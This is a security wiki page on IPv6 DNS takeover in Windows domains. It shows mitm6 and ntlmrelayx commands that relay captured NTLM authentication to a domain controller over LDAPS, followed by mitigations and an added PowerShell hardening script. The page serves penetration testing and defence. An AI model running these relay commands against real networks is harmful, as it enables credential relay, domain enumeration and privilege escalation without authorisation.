Bufu-Sec Wiki
IPv6 Attacks

Overview

  • Windows prefers IPv6 over IPv4. On most corporate networks IPv6 is enabled on every client but never deployed, so no legitimate DHCPv6 server or IPv6 DNS server exists and nothing answers the DHCPv6 Solicit messages clients send periodically

  • An attacker on the same segment (mitm6) answers those solicits and hands out its own address as the IPv6 DNS server, taking over name resolution for the target domain

  • Since the attacker now answers DNS queries, it resolves the WPAD name to itself; clients fetch a proxy configuration from it and authenticate to the rogue proxy with NTLM. Computer accounts also authenticate to the attacker when they boot or when a user logs on

  • The captured NTLM authentication is relayed with ntlmrelayx to the DC over LDAP/LDAPS (or SMB): domain information can be dumped, and with a relayed computer account ntlmrelayx can create a new computer object and configure resource-based constrained delegation

Exploitation

Set Up mitm6

```bash
# Install mitm6 from source (ntlmrelayx.py comes with impacket and is assumed to be installed already)
git clone https://github.com/fox-it/mitm6 /opt/mitm6
cd /opt/mitm6
pip3 install -r requirements.txt
python3 setup.py install
```

IPv6 DNS Takeover via mitm6

```bash
# Run mitm6 against the target domain. -d must be the domain the victims belong to:
# mitm6 answers DHCPv6 Solicits, hands out the attacker as IPv6 DNS server and then
# resolves names under that domain (WPAD included) to itself. Requires root.
mitm6 -d marvel.local

# In a second terminal, relay the captured NTLM authentication to the DC.
#   -6   also listen on IPv6, since victims reach the attacker over v6
#   -t   relay target; LDAPS (not plain LDAP) is needed for write operations such as
#        creating a computer account (--delegate-access)
#   -wh  hostname the fake WPAD file is served from; it must lie inside the domain given
#        to mitm6 -d so that mitm6 resolves it to the attacker
#   -l   directory where the domain enumeration loot is written
ntlmrelayx.py -6 -t ldaps://192.168.31.10 -wh fakepad.marvel.local -l lootme
```

Mitigation

  • Block DHCPv6 traffic (UDP 546/547) and incoming ICMPv6 router advertisements in the Windows Firewall via Group Policy, so clients never accept a rogue host as their IPv6 DNS server. This is preferable to disabling IPv6 entirely, which Microsoft does not recommend

  • Disable WPAD via Group Policy if it is not used, so clients never request a proxy configuration from whoever answers the wpad name

  • Enable LDAP signing and LDAP channel binding on the domain controllers. A relayed NTLM session cannot produce a valid signature or channel binding token, so the relay to LDAP/LDAPS fails

  • Add administrative users to the Protected Users group, or mark them as "Account is sensitive and cannot be delegated", so that a captured or relayed authentication from those users cannot be turned into impersonation via delegation
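The following script is an added example and is not part of the Bufu-Sec wiki. It applies the four mitigations above on a single host so they can be verified before being rolled out through Group Policy. Assumptions that are not from the page: the script runs in an elevated PowerShell session; the LDAP and Protected Users steps run on a domain controller with the ActiveDirectory module installed (pass -IsDomainController); the account names in $PrivilegedUsers are hypothetical sample names; and the registry values used (DisableWpad, LDAPServerIntegrity, LdapEnforceChannelBinding) are the ones Microsoft documents for these settings.

```powershell
#Requires -RunAsAdministrator
# Added example (not the wiki's own code): local equivalents of the IPv6/mitm6 mitigations.
# Test on one host, then deploy the same settings via GPO.
param(
    [string[]]$PrivilegedUsers = @('adm.alice', 'adm.bob'),  # hypothetical sample accounts
    [switch]$IsDomainController                               # run the DC-only steps (3 and 4)
)

function Add-BlockRule {
    param([string]$Name, [hashtable]$Rule)
    # Idempotent: skip if a rule with this display name already exists
    if (-not (Get-NetFirewallRule -DisplayName $Name -ErrorAction SilentlyContinue)) {
        New-NetFirewallRule -DisplayName $Name -Action Block -Profile Any @Rule | Out-Null
    }
}

# 1. Stop the host from ever talking to a rogue DHCPv6 server or accepting a rogue router.
#    Block rules override the built-in "Core Networking" allow rules for DHCPv6.
Add-BlockRule 'Block DHCPv6 Inbound (UDP 546)'  @{ Direction = 'Inbound';  Protocol = 'UDP'; LocalPort  = 546 }
Add-BlockRule 'Block DHCPv6 Outbound (UDP 547)' @{ Direction = 'Outbound'; Protocol = 'UDP'; RemotePort = 547 }
# ICMPv6 type 134 = Router Advertisement
Add-BlockRule 'Block ICMPv6 Router Advertisements' @{ Direction = 'Inbound'; Protocol = 'ICMPv6'; IcmpType = '134' }

# 2. Disable WPAD so the host never fetches a proxy script from whoever answers "wpad".
$winHttp = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\WinHttp'
New-Item -Path $winHttp -Force | Out-Null
Set-ItemProperty -Path $winHttp -Name DisableWpad -Value 1 -Type DWord
# Per-user "Automatically detect settings" checkbox for the current user
$ieSettings = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings'
Set-ItemProperty -Path $ieSettings -Name AutoDetect -Value 0 -Type DWord

if ($IsDomainController) {
    # 3. Require LDAP signing and channel binding on the DC. A relayed NTLM session cannot
    #    forge the session signature or the TLS channel binding token, so ntlmrelayx's
    #    LDAP/LDAPS relay is rejected.
    $ntds = 'HKLM:\SYSTEM\CurrentControlSet\Services\NTDS\Parameters'
    Set-ItemProperty -Path $ntds -Name LDAPServerIntegrity        -Value 2 -Type DWord  # 2 = require signing
    Set-ItemProperty -Path $ntds -Name LdapEnforceChannelBinding  -Value 2 -Type DWord  # 2 = always enforce

    # 4. Protect privileged users from delegation-based impersonation.
    Import-Module ActiveDirectory
    foreach ($user in $PrivilegedUsers) {
        Add-ADGroupMember -Identity 'Protected Users' -Members $user -ErrorAction Stop
        Set-ADUser -Identity $user -AccountNotDelegated $true
    }

    # Verification: every listed account must now be non-delegatable and a Protected User
    $protectedDn = (Get-ADGroup 'Protected Users').DistinguishedName
    Get-ADUser -Identity $PrivilegedUsers[0] -Properties AccountNotDelegated, MemberOf | Out-Null
    foreach ($user in $PrivilegedUsers) {
        $u = Get-ADUser -Identity $user -Properties AccountNotDelegated, MemberOf
        [pscustomobject]@{
            User            = $u.SamAccountName
            NotDelegated    = $u.AccountNotDelegated
            ProtectedUser   = $u.MemberOf -contains $protectedDn
        }
    }
}

# Verification of the firewall rules on this host
Get-NetFirewallRule -DisplayName 'Block DHCPv6*', 'Block ICMPv6*' |
    Select-Object DisplayName, Enabled, Direction, Action
```

Two caveats when running this: Protected Users requires a 2012 R2 domain functional level and disables NTLM, RC4 and all delegation for its members, so it is meant for interactive admin accounts, not service or computer accounts; and LdapEnforceChannelBinding = 2 will break legacy clients that do not send channel binding tokens, so check the DC's LDAP diagnostic events (2889 and 3039) before enforcing domain-wide.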
